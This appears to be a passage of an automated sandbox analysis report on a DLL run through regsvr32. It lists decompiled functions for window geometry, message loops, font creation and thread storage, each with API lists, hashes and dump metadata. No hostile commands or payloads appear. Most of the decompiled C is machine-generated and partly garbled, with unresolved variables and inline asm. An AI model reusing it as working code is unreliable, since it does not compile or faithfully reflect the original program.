                                                                                                            0x1001bcce
                                                                                                            0x1001bcdc
                                                                                                            0x00000000
                                                                                                            0x1001bcde
                                                                                                            0x1001bcde
                                                                                                            0x00000000
                                                                                                            0x1001bcde
                                                                                                            0x1001bce5
                                                                                                            0x1001bce5
                                                                                                            0x1001bce5
                                                                                                            0x1001bce8
                                                                                                            0x1001bcff
                                                                                                            0x1001bcff
                                                                                                            0x1001bd01
                                                                                                            0x00000000
                                                                                                            0x1001bd03
                                                                                                            0x1001bd03
                                                                                                            0x1001bd07
                                                                                                            0x00000000
                                                                                                            0x1001bd09
                                                                                                            0x1001bd09
                                                                                                            0x00000000
                                                                                                            0x1001bd09
                                                                                                            0x1001bd07
                                                                                                            0x1001bcea
                                                                                                            0x1001bcea
                                                                                                            0x1001bcf0
                                                                                                            0x00000000
                                                                                                            0x1001bcf2
                                                                                                            0x1001bcf2
                                                                                                            0x1001bcf6
                                                                                                            0x1001bd26
                                                                                                            0x1001bd26
                                                                                                            0x1001bd2b
                                                                                                            0x1001bd2e
                                                                                                            0x1001bd2f
                                                                                                            0x1001bd34
                                                                                                            0x1001bcf8
                                                                                                            0x1001bcf8
                                                                                                            0x1001bd0e
                                                                                                            0x1001bd11
                                                                                                            0x1001bd12
                                                                                                            0x1001bd17
                                                                                                            0x1001bd17
                                                                                                            0x1001bcf6
                                                                                                            0x1001bcf0
                                                                                                            0x1001bce8
                                                                                                            0x1001bd1b
                                                                                                            0x1001be92
                                                                                                            0x1001be92
                                                                                                            0x1001be92
                                                                                                            0x1001bdb0
                                                                                                            0x1001bdb0
                                                                                                            0x1001bdb0
                                                                                                            0x1001beb3
                                                                                                            0x1001beb3
                                                                                                            0x1001beb9
                                                                                                            0x1001bebd
                                                                                                            0x1001bec1
                                                                                                            0x1001bec5
                                                                                                            0x1001bec5
                                                                                                            0x1001bea1

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ___shr_12
                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$?
                                                                                                            • API String ID: 2664560246-4131533671
                                                                                                            • Opcode ID: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                                                            • Instruction ID: 0f4b10661b4c6afdc81634f06d58437e80c3cbb5605fe3a4bfa1b348def2c0f3
                                                                                                            • Opcode Fuzzy Hash: 41872633d6340cc6f23dba41c7221c5f3b32f20f70e5c2c0d702b1f865941683
                                                                                                            • Instruction Fuzzy Hash: 47810232804A9ACECF01CB68C8847EEBBF4EF15354F0545AAE850DF282E774D685C3A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1002DA8D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 174COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 29%
                                                                                                            			E1002DA8D(intOrPtr __ecx, void* __edx) {
				void* __esi;
				void* __ebp;
				intOrPtr _t60;
				signed char _t65;
				signed int _t70;
				signed int _t71;
				intOrPtr _t109;
				signed int _t115;
				signed int _t117;
				void* _t133;
				void* _t135;
				intOrPtr _t140;
				void* _t143;
				void* _t145;

				_t133 = __edx;
				_t143 = _t145 - 0xa8;
				_t60 =  *0x1004c470; // 0xf3933a06
				_t140 =  *((intOrPtr*)(_t143 + 0xb0));
				 *((intOrPtr*)(_t143 + 0xa4)) = _t60;
				_t109 = __ecx;
				_t62 = GetWindowRect( *(_t140 + 0x1c), _t143 - 0x80);
				if( *((intOrPtr*)(_t140 + 0x88)) != _t109 ||  *(_t143 + 0xb4) != 0 && EqualRect(_t143 - 0x80,  *(_t143 + 0xb4)) == 0) {
					if( *((intOrPtr*)(_t109 + 0x90)) != 0 && ( *(_t140 + 0x80) & 0x00000040) != 0) {
						 *(_t109 + 0x7c) =  *(_t109 + 0x7c) | 0x00000040;
					}
					 *(_t109 + 0x7c) =  *(_t109 + 0x7c) & 0xfffffff9;
					_t65 =  *(_t140 + 0x7c) & 0x00000006 |  *(_t109 + 0x7c);
					 *(_t109 + 0x7c) = _t65;
					if((_t65 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t143 - 0x60);
						E1002095F(_t140);
						E10029B23(_t140,  *((intOrPtr*)(_t109 + 0x1c)), _t143 - 0x60);
					}
					_t70 = ( *(_t140 + 0x7c) ^  *(_t109 + 0x7c)) & 0x0000f000 ^  *(_t140 + 0x7c) | 0x00000f00;
					if( *((intOrPtr*)(_t109 + 0x90)) == 0) {
						_t71 = _t70 & 0xfffffffe;
					} else {
						_t71 = _t70 | 0x00000001;
					}
					E100383D0(_t140, _t71);
					_push(0xffffffff);
					_t135 = E1002CDCE(_t109, GetDlgCtrlID( *(_t140 + 0x1c)) & 0x0000ffff);
					if(_t135 > 0) {
						 *((intOrPtr*)(E100086F2(_t109 + 0x94, _t135))) = _t140;
					}
					if( *(_t143 + 0xb4) == 0) {
						if(_t135 < 1) {
							_t137 = _t109 + 0x94;
							E1001E2BE(_t109 + 0x94, _t143,  *((intOrPtr*)(_t109 + 0x9c)), _t140);
							E1001E2BE(_t137, _t143,  *((intOrPtr*)(_t137 + 8)), 0);
						}
						_t115 =  *0x1004efa4; // 0x2
						_push(0x115);
						_push(0);
						_push(0);
						_push( ~_t115);
						_t117 =  *0x1004efa0; // 0x2
						_push( ~_t117);
						_push(0);
					} else {
						CopyRect(_t143 - 0x70,  *(_t143 + 0xb4));
						E10028E5A(_t109, _t143 - 0x70);
						if(_t135 < 1) {
							asm("cdq");
							asm("cdq");
							_push(( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)) - _t133 >> 1) +  *((intOrPtr*)(_t143 - 0x6c)));
							_push(( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70) - _t133 >> 1) +  *(_t143 - 0x70));
							_push( *((intOrPtr*)(_t143 + 0xb0)));
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E1002CE2A(_t109);
							_t140 =  *((intOrPtr*)(_t143 + 0xb0));
						}
						_push(0x114);
						_push( *((intOrPtr*)(_t143 - 0x64)) -  *((intOrPtr*)(_t143 - 0x6c)));
						_push( *((intOrPtr*)(_t143 - 0x68)) -  *(_t143 - 0x70));
						_push( *((intOrPtr*)(_t143 - 0x6c)));
						_push( *(_t143 - 0x70));
						_push(0);
					}
					E100204FE(_t140);
					if(E100220EE(_t143, GetParent( *(_t140 + 0x1c))) != _t109) {
						E1000870E(_t140, _t109);
					}
					_t120 =  *((intOrPtr*)(_t140 + 0x88));
					if( *((intOrPtr*)(_t140 + 0x88)) != 0) {
						E1002D1B2(_t120, _t140, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t140 + 0x88)) = _t109;
					 *(E100314D8(_t109) + 0xcc) =  *(_t62 + 0xcc) | 0x0000000c;
				}
				return E100117AE(_t62,  *((intOrPtr*)(_t143 + 0xa4)));
			}

















                                                                                                            0x1002da8d
                                                                                                            0x1002da8e
                                                                                                            0x1002da9b
                                                                                                            0x1002daa2
                                                                                                            0x1002daa8
                                                                                                            0x1002dab6
                                                                                                            0x1002dab8
                                                                                                            0x1002dac4
                                                                                                            0x1002daf2
                                                                                                            0x1002dafd
                                                                                                            0x1002dafd
                                                                                                            0x1002db01
                                                                                                            0x1002db0e
                                                                                                            0x1002db12
                                                                                                            0x1002db15
                                                                                                            0x1002db17
                                                                                                            0x1002db1f
                                                                                                            0x1002db22
                                                                                                            0x1002db2e
                                                                                                            0x1002db2e
                                                                                                            0x1002db41
                                                                                                            0x1002db4d
                                                                                                            0x1002db54
                                                                                                            0x1002db4f
                                                                                                            0x1002db4f
                                                                                                            0x1002db4f
                                                                                                            0x1002db5a
                                                                                                            0x1002db5f
                                                                                                            0x1002db75
                                                                                                            0x1002db79
                                                                                                            0x1002db87
                                                                                                            0x1002db87
                                                                                                            0x1002db90
                                                                                                            0x1002dc11
                                                                                                            0x1002dc13
                                                                                                            0x1002dc1f
                                                                                                            0x1002dc2b
                                                                                                            0x1002dc2b
                                                                                                            0x1002dc30
                                                                                                            0x1002dc36
                                                                                                            0x1002dc3d
                                                                                                            0x1002dc3e
                                                                                                            0x1002dc41
                                                                                                            0x1002dc42
                                                                                                            0x1002dc4a
                                                                                                            0x1002dc4b
                                                                                                            0x1002db92
                                                                                                            0x1002db9c
                                                                                                            0x1002dba8
                                                                                                            0x1002dbb0
                                                                                                            0x1002dbbb
                                                                                                            0x1002dbcb
                                                                                                            0x1002dbd3
                                                                                                            0x1002dbd4
                                                                                                            0x1002dbda
                                                                                                            0x1002dbe0
                                                                                                            0x1002dbe1
                                                                                                            0x1002dbe2
                                                                                                            0x1002dbe5
                                                                                                            0x1002dbe6
                                                                                                            0x1002dbeb
                                                                                                            0x1002dbeb
                                                                                                            0x1002dbf7
                                                                                                            0x1002dbfc
                                                                                                            0x1002dc03
                                                                                                            0x1002dc04
                                                                                                            0x1002dc07
                                                                                                            0x1002dc0a
                                                                                                            0x1002dc0a
                                                                                                            0x1002dc4e
                                                                                                            0x1002dc64
                                                                                                            0x1002dc69
                                                                                                            0x1002dc69
                                                                                                            0x1002dc6e
                                                                                                            0x1002dc76
                                                                                                            0x1002dc7d
                                                                                                            0x1002dc7d
                                                                                                            0x1002dc84
                                                                                                            0x1002dc8f
                                                                                                            0x1002dc8f
                                                                                                            0x1002dcab

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$CopyCtrlEqualParentWindow
                                                                                                            • String ID: @
                                                                                                            • API String ID: 2544134605-2766056989
                                                                                                            • Opcode ID: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                                                            • Instruction ID: b45b6ef3e14a7e4d87b63386d5d067ae84193d18a4a25c559dd4ceadf4ed8576
                                                                                                            • Opcode Fuzzy Hash: c20e828919207d0164ea6c25dc37f68ea2733143114ea03cae4a2a36553e5d5a
                                                                                                            • Instruction Fuzzy Hash: E651BA716006499FDF25DF68DC95BAE77AAFF44300F504529E91ADB1A2CB30AD05CB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10021B92 Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10021B92(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				struct HWND__* _t42;
				signed int _t45;
				int _t53;
				long _t56;
				int _t62;
				intOrPtr* _t69;

				_t62 = 1;
				_t69 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E100202AB(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t69 + 0x1c));
				 *(_t69 + 0x38) =  *(_t69 + 0x38) | 0x00000018;
				_v4 = _t42;
				_v8 = E1001F7B7();
				L14:
				while(1) {
					L14:
					while(_v12 != 0) {
						if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
							while(1) {
								L15:
								_t45 = E1001FABB();
								if(_t45 == 0) {
									break;
								}
								if(_t62 != 0) {
									_t53 = _v8->message;
									if(_t53 == 0x118 || _t53 == 0x104) {
										E100203AD(_t69, 1);
										UpdateWindow( *(_t69 + 0x1c));
										_t62 = 0;
									}
								}
								if( *((intOrPtr*)( *_t69 + 0x80))() == 0) {
									 *(_t69 + 0x38) =  *(_t69 + 0x38) & 0xffffffe7;
									return  *((intOrPtr*)(_t69 + 0x40));
								} else {
									if(E1001FA27(_v8) != 0) {
										_v12 = 1;
										_v16 = 0;
									}
									if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
										continue;
									} else {
										goto L14;
									}
								}
							}
							_push(0);
							E1003A098();
							return _t45 | 0xffffffff;
						}
						if(_t62 != 0) {
							E100203AD(_t69, 1);
							UpdateWindow( *(_t69 + 0x1c));
							_t62 = 0;
						}
						if((_a4 & 0x00000001) == 0 && _v4 != 0 && _v16 == 0) {
							SendMessageA(_v4, 0x121, 0,  *(_t69 + 0x1c));
						}
						if((_a4 & 0x00000002) != 0) {
							L13:
							_v12 = 0;
							continue;
						} else {
							_t56 = SendMessageA( *(_t69 + 0x1c), 0x36a, 0, _v16);
							_v16 = _v16 + 1;
							if(_t56 != 0) {
								continue;
							}
							goto L13;
						}
					}
					goto L15;
				}
			}













                                                                                                            0x10021b9b
                                                                                                            0x10021ba3
                                                                                                            0x10021ba5
                                                                                                            0x10021ba9
                                                                                                            0x10021bad
                                                                                                            0x10021bbb
                                                                                                            0x10021bbb
                                                                                                            0x10021bc0
                                                                                                            0x10021bc6
                                                                                                            0x10021bca
                                                                                                            0x10021bd9
                                                                                                            0x00000000
                                                                                                            0x10021c51
                                                                                                            0x00000000
                                                                                                            0x10021c51
                                                                                                            0x10021bef
                                                                                                            0x10021c57
                                                                                                            0x10021c57
                                                                                                            0x10021c57
                                                                                                            0x10021c5e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021c62
                                                                                                            0x10021c68
                                                                                                            0x10021c70
                                                                                                            0x10021c7d
                                                                                                            0x10021c85
                                                                                                            0x10021c87
                                                                                                            0x10021c87
                                                                                                            0x10021c70
                                                                                                            0x10021c95
                                                                                                            0x10021cd0
                                                                                                            0x00000000
                                                                                                            0x10021c97
                                                                                                            0x10021ca3
                                                                                                            0x10021ca5
                                                                                                            0x10021cad
                                                                                                            0x10021cad
                                                                                                            0x10021cc1
                                                                                                            0x00000000
                                                                                                            0x10021cc3
                                                                                                            0x00000000
                                                                                                            0x10021cc3
                                                                                                            0x10021cc1
                                                                                                            0x10021c95
                                                                                                            0x10021cc5
                                                                                                            0x10021cc6
                                                                                                            0x00000000
                                                                                                            0x10021ccb
                                                                                                            0x10021bf3
                                                                                                            0x10021bf9
                                                                                                            0x10021c01
                                                                                                            0x10021c03
                                                                                                            0x10021c03
                                                                                                            0x10021c0a
                                                                                                            0x10021c25
                                                                                                            0x10021c25
                                                                                                            0x10021c30
                                                                                                            0x10021c4d
                                                                                                            0x10021c4d
                                                                                                            0x00000000
                                                                                                            0x10021c32
                                                                                                            0x10021c3f
                                                                                                            0x10021c45
                                                                                                            0x10021c4b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021c4b
                                                                                                            0x10021c30
                                                                                                            0x00000000
                                                                                                            0x10021c51

                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 10021BC0
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10021BE7
                                                                                                            • UpdateWindow.USER32(?), ref: 10021C01
                                                                                                            • SendMessageA.USER32 ref: 10021C25
                                                                                                            • SendMessageA.USER32 ref: 10021C3F
                                                                                                            • UpdateWindow.USER32(?), ref: 10021C85
                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 10021CB9
                                                                                                              • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                            • String ID:
                                                                                                            • API String ID: 2853195852-0
                                                                                                            • Opcode ID: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
                                                                                                            • Instruction ID: 572a0072a054787b928fb31f1bd515718dba8d5f307fe0ba771f0ec6dbe0ec5d
                                                                                                            • Opcode Fuzzy Hash: 5ee4d89bd6c594df32917749107b3ff340b5b4dd3c4e0b0819ec5134911ec0b1
                                                                                                            • Instruction Fuzzy Hash: AC41D4382047419FD722CF22AC88E5BBAF5FFD1794FA0092DF881951A1D732E945CB52
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000943B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114comstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E1000943B(void* __ecx) {
				intOrPtr _t54;
				intOrPtr _t56;
				signed int _t72;
				signed int _t74;
				signed int _t79;
				void* _t81;
				void* _t85;
				void* _t100;
				void* _t101;
				void* _t103;
				signed int _t106;
				intOrPtr* _t107;
				void* _t109;
				void* _t111;
				void* _t112;

				E10011BF0(0x1003add7, _t109);
				_t112 = _t111 - 0x80;
				_t54 =  *0x1004c470; // 0xf3933a06
				 *((intOrPtr*)(_t109 - 0x10)) = _t54;
				_t101 = __ecx;
				 *((intOrPtr*)(_t109 - 0x58)) =  *0x1004b0a0(_t100, _t103, _t85);
				 *((intOrPtr*)(_t109 - 0x50)) = 0;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x10040430;
				_t56 =  *((intOrPtr*)(_t109 + 8));
				 *(_t109 - 4) = 0;
				if(_t56 == 0 ||  *(_t56 + 4) == 0) {
					if(E100090AB(_t109 - 0x54, 0x11) != 0 || E100090AB(_t109 - 0x54, 0xd) != 0) {
						_t56 = _t109 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t101 + 0x60)) = 0;
					}
				} else {
					L6:
					_t13 = _t56 + 4; // 0x10009a67
					GetObjectA( *_t13, 0x3c, _t109 - 0x4c);
					 *(_t109 - 0x78) = 0x20;
					_t105 = lstrlenA(_t109 - 0x30) + 1;
					E10010B20(lstrlenA(_t109 - 0x30) + 0x00000001 + lstrlenA(_t109 - 0x30) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109 - 0x4c);
					 *((intOrPtr*)(_t109 - 0x74)) = E100067FA(_t112, _t109 - 0x30, _t105,  *((intOrPtr*)(_t109 - 0x58)));
					 *((short*)(_t109 - 0x68)) =  *((intOrPtr*)(_t109 - 0x3c));
					 *(_t109 - 0x66) =  *(_t109 - 0x35) & 0x000000ff;
					 *(_t109 - 0x64) =  *(_t109 - 0x38) & 0x000000ff;
					 *(_t109 - 0x60) =  *(_t109 - 0x37) & 0x000000ff;
					 *(_t109 - 0x5c) =  *(_t109 - 0x36) & 0x000000ff;
					_t72 =  *(_t109 - 0x4c);
					__eflags = _t72;
					_t106 = _t72;
					if(_t72 < 0) {
						_t106 =  ~_t72;
					}
					E10029194(_t109 - 0x8c);
					 *(_t109 - 4) = 1;
					_t74 = GetDeviceCaps( *(_t109 - 0x84), 0x5a);
					asm("cdq");
					_t107 = _t101 + 0x60;
					 *((intOrPtr*)(_t109 - 0x6c)) = 0;
					 *(_t109 - 0x70) = _t106 * 0xafc80 / _t74;
					E1003881B(_t107);
					_t79 = _t109 - 0x78;
					__imp__#420(_t79, 0x10043168, _t107,  *((intOrPtr*)(_t101 + 0x1c)));
					__eflags = _t79;
					if(__eflags < 0) {
						 *_t107 = 0;
					}
					 *(_t109 - 4) = 0;
					E100291EF(_t109 - 0x8c, __eflags);
				}
				 *(_t109 - 4) =  *(_t109 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t109 - 0x54)) = 0x1003eb6c;
				_t81 = E100293B4(_t109 - 0x54);
				 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
				return E100117AE(_t81,  *((intOrPtr*)(_t109 - 0x10)));
			}


















                                                                                                            0x10009440
                                                                                                            0x10009445
                                                                                                            0x1000944b
                                                                                                            0x10009453
                                                                                                            0x10009456
                                                                                                            0x10009460
                                                                                                            0x10009463
                                                                                                            0x10009466
                                                                                                            0x1000946d
                                                                                                            0x10009472
                                                                                                            0x10009475
                                                                                                            0x10009488
                                                                                                            0x100094a0
                                                                                                            0x00000000
                                                                                                            0x10009498
                                                                                                            0x10009498
                                                                                                            0x10009498
                                                                                                            0x100094a3
                                                                                                            0x100094a3
                                                                                                            0x100094a9
                                                                                                            0x100094ac
                                                                                                            0x100094b6
                                                                                                            0x100094c5
                                                                                                            0x100094cf
                                                                                                            0x100094e4
                                                                                                            0x100094eb
                                                                                                            0x100094f4
                                                                                                            0x100094fc
                                                                                                            0x10009503
                                                                                                            0x1000950a
                                                                                                            0x1000950d
                                                                                                            0x10009510
                                                                                                            0x10009512
                                                                                                            0x10009514
                                                                                                            0x10009518
                                                                                                            0x10009518
                                                                                                            0x10009523
                                                                                                            0x10009530
                                                                                                            0x10009534
                                                                                                            0x10009544
                                                                                                            0x10009547
                                                                                                            0x1000954b
                                                                                                            0x1000954e
                                                                                                            0x10009551
                                                                                                            0x1000955c
                                                                                                            0x10009560
                                                                                                            0x10009566
                                                                                                            0x10009568
                                                                                                            0x1000956a
                                                                                                            0x1000956a
                                                                                                            0x10009572
                                                                                                            0x10009575
                                                                                                            0x10009575
                                                                                                            0x1000957a
                                                                                                            0x10009581
                                                                                                            0x10009588
                                                                                                            0x10009596
                                                                                                            0x100095a9

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10009440
                                                                                                            • GetObjectA.GDI32(10009A67,0000003C,?), ref: 100094AC
                                                                                                            • lstrlenA.KERNEL32(?), ref: 100094BD
                                                                                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 10009534
                                                                                                            • OleCreateFontIndirect.OLEAUT32(00000020,10043168,?), ref: 10009560
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontH_prologIndirectObjectlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4082312370-3916222277
                                                                                                            • Opcode ID: c9eae7b3fc1a36e4ece0a6461cbd5fbb0f42655d26c805cc56fff76f0e8a2cce
                                                                                                            • Instruction ID: 94df4567bccff522b7d7bd0d545f1ce16673c33dc0c382d35917ea97f1dbbf88
                                                                                                            • Opcode Fuzzy Hash: c9eae7b3fc1a36e4ece0a6461cbd5fbb0f42655d26c805cc56fff76f0e8a2cce
                                                                                                            • Instruction Fuzzy Hash: C641BA75D01259AFEB10CFE5C885ADDBBB4FF09344F50802AE856EB292E7349A04CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10037732 Relevance: 10.6, APIs: 7, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10037732(long* __ecx, signed int _a4, intOrPtr _a8) {
				struct _CRITICAL_SECTION* _v8;
				void* __ebp;
				void* _t32;
				void* _t36;
				void* _t37;
				signed int _t52;
				long* _t59;
				struct _CRITICAL_SECTION* _t62;
				void* _t64;

				_push(__ecx);
				_t59 = __ecx;
				_t1 =  &(_t59[7]); // 0x1004f010
				_t62 = _t1;
				_v8 = _t62;
				EnterCriticalSection(_t62);
				_t32 = _a4;
				if(_t32 <= 0) {
					L20:
					LeaveCriticalSection(_t62);
				} else {
					_t4 =  &(_t59[3]); // 0x3
					if(_t32 >=  *_t4) {
						goto L20;
					} else {
						_t64 = TlsGetValue( *_t59);
						if(_t64 == 0) {
							if(E1003741E(0x10) == 0) {
								_t64 = 0;
							} else {
								_t64 = E10037684(_t34);
							}
							 *(_t64 + 8) = 0;
							 *(_t64 + 0xc) = 0;
							_t10 =  &(_t59[5]); // 0x6c09d8
							_t49 =  *_t10;
							_t11 =  &(_t59[6]); // 0x4
							 *(_t64 +  *_t11) =  *_t10;
							_t59[5] = _t64;
							goto L10;
						} else {
							_t52 = _a4;
							if(_t52 >=  *(_t64 + 8) && _a8 != 0) {
								L10:
								_t36 =  *(_t64 + 0xc);
								if(_t36 != 0) {
									_t16 =  &(_t59[3]); // 0x3
									_t49 =  *_t16 << 2;
									_t37 = LocalReAlloc(_t36,  *_t16 << 2, 2);
								} else {
									_t15 =  &(_t59[3]); // 0x3
									_t37 = LocalAlloc(0,  *_t15 << 2);
								}
								if(_t37 == 0) {
									LeaveCriticalSection(_v8);
									_t37 = E1001CE3B(_t49);
								}
								 *(_t64 + 0xc) = _t37;
								_t20 =  &(_t59[3]); // 0x3
								E10011C50(_t37 +  *(_t64 + 8) * 4, 0,  *_t20 -  *(_t64 + 8) << 2);
								_t23 =  &(_t59[3]); // 0x3
								 *(_t64 + 8) =  *_t23;
								TlsSetValue( *_t59, _t64);
								_t52 = _a4;
							}
						}
						_t32 =  *(_t64 + 0xc);
						if(_t32 != 0 && _t52 <  *(_t64 + 8)) {
							 *((intOrPtr*)(_t32 + _t52 * 4)) = _a8;
						}
						LeaveCriticalSection(_v8);
					}
				}
				return _t32;
			}












                                                                                                            0x10037735
                                                                                                            0x10037739
                                                                                                            0x1003773b
                                                                                                            0x1003773b
                                                                                                            0x1003773f
                                                                                                            0x10037742
                                                                                                            0x10037748
                                                                                                            0x1003774f
                                                                                                            0x1003782b
                                                                                                            0x1003782c
                                                                                                            0x10037755
                                                                                                            0x10037755
                                                                                                            0x10037758
                                                                                                            0x00000000
                                                                                                            0x1003775e
                                                                                                            0x10037766
                                                                                                            0x1003776a
                                                                                                            0x1003778c
                                                                                                            0x10037799
                                                                                                            0x1003778e
                                                                                                            0x10037795
                                                                                                            0x10037795
                                                                                                            0x1003779b
                                                                                                            0x1003779e
                                                                                                            0x100377a1
                                                                                                            0x100377a1
                                                                                                            0x100377a4
                                                                                                            0x100377a7
                                                                                                            0x100377aa
                                                                                                            0x00000000
                                                                                                            0x1003776c
                                                                                                            0x1003776c
                                                                                                            0x10037772
                                                                                                            0x100377ad
                                                                                                            0x100377ad
                                                                                                            0x100377b2
                                                                                                            0x100377c4
                                                                                                            0x100377c9
                                                                                                            0x100377ce
                                                                                                            0x100377b4
                                                                                                            0x100377b4
                                                                                                            0x100377bc
                                                                                                            0x100377bc
                                                                                                            0x100377d6
                                                                                                            0x100377db
                                                                                                            0x100377e1
                                                                                                            0x100377e1
                                                                                                            0x100377e9
                                                                                                            0x100377ec
                                                                                                            0x100377fa
                                                                                                            0x100377ff
                                                                                                            0x10037806
                                                                                                            0x1003780b
                                                                                                            0x10037811
                                                                                                            0x10037811
                                                                                                            0x10037772
                                                                                                            0x10037814
                                                                                                            0x10037819
                                                                                                            0x10037823
                                                                                                            0x10037823
                                                                                                            0x1003782c
                                                                                                            0x1003782c
                                                                                                            0x10037758
                                                                                                            0x10037836

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(1004F010,00000000,?,00000000,1004EFF4,?,100378BD,?,00000000,?,?,?,?,100373C4,100347FD,100071DC), ref: 10037742
